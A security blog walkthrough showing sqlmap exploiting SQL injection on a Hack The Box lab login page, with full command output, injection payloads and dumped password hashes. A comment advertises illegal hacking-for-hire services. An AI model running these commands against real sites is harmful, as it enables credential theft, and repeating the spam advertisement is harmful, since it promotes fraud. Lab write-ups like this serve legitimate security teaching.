How To Dump Username And Password Using SQLMap Tool?
Table of Content
- What is sqlmap in Kali?
- Dump Username And Password Using SQLMap
What is sqlmap in Kali?
SQLMap is an open-source tool that is used to both identify and exploit SQL injection vulnerabilities. SQLMap contains many advanced features such as the ability to dump username and password from a remote website and bypass WAF (Web Application Firewall) etc.
Dump Username And Password Using Sqlmap
In this blog, We are going to Introduce about SQLMap tool, which is most popular. Using this tool we will dump username and password from the remote website.
Let’s begin. We have opened the login page of Europa Corp admin portal. Keep in mind that this is a virtual environment. Don’t try to attack this website.
Let’s put some random email and password. First, we will intercept this traffic using the burp suite tool that comes pre-installed in Kali Linux.
We have intercepted all traffic of Europa Corp admin portal website using the burp suite tool. Let’s copy all content and save it in sql.req file.
sql.req file looks like this. Let’s open it using the cat command, which comes pre-installed in Kali Linux.
Before using the sqlmap tool, keep in mind that this website uses HTTPS (Hypertext Transfer Protocol Secure). If you don’t add –force-ssl command with sqlmap tool, you can get an SSL error. At this time, we will retrieve the database name using –dbs command.
sqlmap -r sql.req --force-ssl --dbs
sqlmap -r sql.req --force-ssl --dbs ___ __H__ ___ ___["]_____ ___ ___ {1.6.1.1#dev} |_ -| . [.] | .'| . | |___|_ [)]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 23:59:46 /2022-01-16/ [23:59:46] [INFO] parsing HTTP request from 'sql.req' [23:59:46] [INFO] resuming back-end DBMS 'mysql' [23:59:46] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: email (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: [email protected]' RLIKE (SELECT (CASE WHEN (5462=5462) THEN 0x61646d696e406575726f7061636f72702e687462 ELSE 0x28 END))-- uqLz&password=password Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: [email protected]' AND GTID_SUBSET(CONCAT(0x7178627671,(SELECT (ELT(6429=6429,1))),0x716a787871),6429)-- gHDo&password=password Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: [email protected]' AND (SELECT 4034 FROM (SELECT(SLEEP(5)))WwrX)-- frlv&password=password --- [23:59:48] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial) web application technology: Apache 2.4.18 back-end DBMS: MySQL 5 [23:59:48] [INFO] fetching database names [23:59:48] [INFO] resumed: 'information_schema' [23:59:48] [INFO] resumed: 'admin' available databases [2]: [*] admin [*] information_schema [23:59:48] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/admin-portal.europacorp.htb' [*] ending @ 23:59:48 /2022-01-16/
Our first mission completed successfully. We have got the database name of remote website using the above command. Let’s find out all tables inside admin database. I think you should follow the below command.
sqlmap -r sql.req --force-ssl -D admin --tables
sqlmap -r sql.req --force-ssl -D admin --tables ___ __H__ ___ ___[)]_____ ___ ___ {1.6.1.1#dev} |_ -| . ['] | .'| . | |___|_ [)]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or da mage caused by this program [*] starting @ 00:03:09 /2022-01-17/ [00:03:09] [INFO] parsing HTTP request from 'sql.req' [00:03:10] [INFO] resuming back-end DBMS 'mysql' [00:03:10] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: email (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: [email protected]' RLIKE (SELECT (CASE WHEN (5462=5462) THEN 0x61646d696e406575726f7061636f72702e687462 ELSE 0x28 END))-- uqLz&password=password Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: [email protected]' AND GTID_SUBSET(CONCAT(0x7178627671,(SELECT (ELT(6429=6429,1))),0x716a787871),6429)-- gHDo&password=password Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: [email protected]' AND (SELECT 4034 FROM (SELECT(SLEEP(5)))WwrX)-- frlv&password=password --- [00:03:11] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial) web application technology: Apache 2.4.18 back-end DBMS: MySQL 5 [00:03:11] [INFO] fetching tables for database: 'admin' [00:03:11] [INFO] resumed: 'users' Database: admin [1 table] +-------+ | users | +-------+ [00:03:11] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/admin-portal.europacorp.htb' [*] ending @ 00:03:11 /2022-01-17/
We have got the table name inside the admin database using the above command. Let’s find out all columns inside users table.
sqlmap -r sql.req --force-ssl -D admin -T users --columns
sqlmap -r sql.req --force-ssl -D admin -T users --columns ___ __H__ ___ ___[']_____ ___ ___ {1.6.1.1#dev} |_ -| . [(] | .'| . | |___|_ [,]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 00:05:52 /2022-01-17/ [00:05:52] [INFO] parsing HTTP request from 'sql.req' [00:05:53] [INFO] resuming back-end DBMS 'mysql' [00:05:53] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: email (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: [email protected]' RLIKE (SELECT (CASE WHEN (5462=5462) THEN 0x61646d696e406575726f7061636f72702e687462 ELSE 0x28 END))-- uqLz&password=password Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: [email protected]' AND GTID_SUBSET(CONCAT(0x7178627671,(SELECT (ELT(6429=6429,1))),0x716a787871),6429)-- gHDo&password=password Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: [email protected]' AND (SELECT 4034 FROM (SELECT(SLEEP(5)))WwrX)-- frlv&password=password --- [00:05:54] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial) web application technology: Apache 2.4.18 back-end DBMS: MySQL 5 [00:05:54] [INFO] fetching columns for table 'users' in database 'admin' [00:05:54] [INFO] resumed: 'id' [00:05:54] [INFO] resumed: 'int(11)' [00:05:54] [INFO] resumed: 'username' [00:05:54] [INFO] resumed: 'varchar(255)' [00:05:54] [INFO] resumed: 'email' [00:05:54] [INFO] resumed: 'varchar(255)' [00:05:54] [INFO] resumed: 'password' [00:05:54] [INFO] resumed: 'varchar(255)' [00:05:54] [INFO] resumed: 'active' [00:05:54] [INFO] resumed: 'tinyint(1)' Database: admin Table: users [5 columns] +----------+--------------+ | Column | Type | +----------+--------------+ | active | tinyint(1) | | email | varchar(255) | | id | int(11) | | password | varchar(255) | | username | varchar(255) | +----------+--------------+ [00:05:54] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/admin-portal.europacorp.htb' [*] ending @ 00:05:54 /2022-01-17/
We have got the column’s name inside the users table using the above command. Let’s dump email and password credentials. Following the below command.
sqlmap -r sql.req --force-ssl -D admin -T users -C email,password --dump
sqlmap -r sql.req --force-ssl -D admin -T users -C email,password --dump ___ __H__ ___ ___[,]_____ ___ ___ {1.6.1.1#dev} |_ -| . [)] | .'| . | |___|_ ["]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or da mage caused by this program [*] starting @ 00:08:33 /2022-01-17/ [00:08:33] [INFO] parsing HTTP request from 'sql.req' [00:08:34] [INFO] resuming back-end DBMS 'mysql' [00:08:34] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: email (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: [email protected]' RLIKE (SELECT (CASE WHEN (5462=5462) THEN 0x61646d696e406575726f7061636f72702e687462 ELSE 0x28 END))-- uqLz&password=password Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: [email protected]' AND GTID_SUBSET(CONCAT(0x7178627671,(SELECT (ELT(6429=6429,1))),0x716a787871),6429)-- gHDo&password=password Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: [email protected]' AND (SELECT 4034 FROM (SELECT(SLEEP(5)))WwrX)-- frlv&password=password --- [00:08:36] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial) web application technology: Apache 2.4.18 back-end DBMS: MySQL 5 [00:08:36] [INFO] fetching entries of column(s) 'email,password' for table 'users' in database 'admin' [00:08:38] [INFO] retrieved: '[email protected]' [00:08:39] [INFO] retrieved: '2b6d315337f18617ba18922c0b9597ff' [00:08:40] [INFO] retrieved: '[email protected]' [00:08:42] [INFO] retrieved: '2b6d315337f18617ba18922c0b9597ff' [00:08:42] [INFO] recognized possible password hashes in column 'password' do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] n do you want to crack them via a dictionary-based attack? [Y/n/q] n Database: admin Table: users [2 entries] +----------------------+----------------------------------+ | email | password | +----------------------+----------------------------------+ | [email protected] | 2b6d315337f18617ba18922c0b9597ff | | [email protected] | 2b6d315337f18617ba18922c0b9597ff | +----------------------+----------------------------------+ [00:08:46] [INFO] table 'admin.users' dumped to CSV file '/root/.local/share/sqlmap/output/admin-portal.europacorp.htb/dump/admin/users.csv' [00:08:46] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/admin-portal.europacorp.htb' [*] ending @ 00:08:46 /2022-01-17/
Boom! We have got the email and password of the remote website, but the password is encrypted. In modern security, most websites store encrypted passwords inside the database. But I am lazy. To decrypt user hashes, we will use the dcode website.
Let’s put valid credentials inside the email and password field. After that, we got 302 redirections of the remote website.
Take a closer look at the below image.
Login Successful!!!!!
Recent Posts
- CVE-2022-30190 (Follina)-Microsoft Support Diagnostic Tool Vulnerability
- SQL INJECTION – Extracting Username and Password From Database
- How To Dump Username And Password Using SQLMap Tool?
- Protected: Exploit Apache Log4j Security Vulnerabilities – CVE-2021-44228
- Hack The Box Previse HTB CTF Machine Walkthrough
Very Nice Blog Bro
hi…..
I got such a good information on this topic its very interesting one. You made a good site
hi…..
I got such a good information on this topic its very interesting one. You made a good site and I have found a similar website, please check this one Ethical Hacking Training visit the site to know more about cysecon.
The professional hacker true out the word that I believed in him is only Henryclarkethicalhacker Group Hackers Checked Google and see everybody comments on him he a professional that I believed in him if you have problems on any stuffed like a bank, company, school grades change examinations, database, Social media hacks, Email hacks, Phone hacks, Bitcoin hacks, increased Credit score boost to 800, School result upgrading, cryptocurrency, Binary option funds recovery, Bitcoin Mining, Instagram, WhatsApp, Twitter, Monitor your colleague, access your spouse social media, and a lot more, via, , on whatsapp 18134211326..